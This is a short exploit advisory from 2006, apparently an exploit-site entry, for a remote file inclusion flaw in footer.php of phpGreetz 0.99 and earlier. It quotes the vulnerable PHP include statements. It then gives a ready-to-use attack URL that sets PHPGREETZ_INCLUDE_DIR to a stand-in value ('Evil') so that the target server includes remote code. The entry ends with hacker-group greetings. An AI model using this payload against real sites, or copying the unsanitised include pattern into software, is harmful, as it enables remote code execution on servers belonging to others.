id: 922
date: 10/03/2006
title: phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability
author: mozi
cves: 

================================================================
phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability
================================================================



# phpGreetz Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
# Greetz: SpiderZ , fUSiON
------------------------------------------------------------------
<? include("$PHPGREETZ_INCLUDE_DIR/language/langlist.php"); ?>
("phpgreetz-global.inc.php");
("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php");
<td colspan="2" valign="top" align="left"><? include($site_location . "/includes/navigation.php"); ?>
$PHPGREETZ_INCLUDE_DIR = "$site_location/includes";
_________________________________________________________________
http://site.com/[path]/includes/footer.php?PHPGREETZ_INCLUDE_DIR=Evil
.
### eu.undernet.org #phpfreaks team

 
#phpfreaks again
# heh tnx



#  0day.today [2023-03-26]  #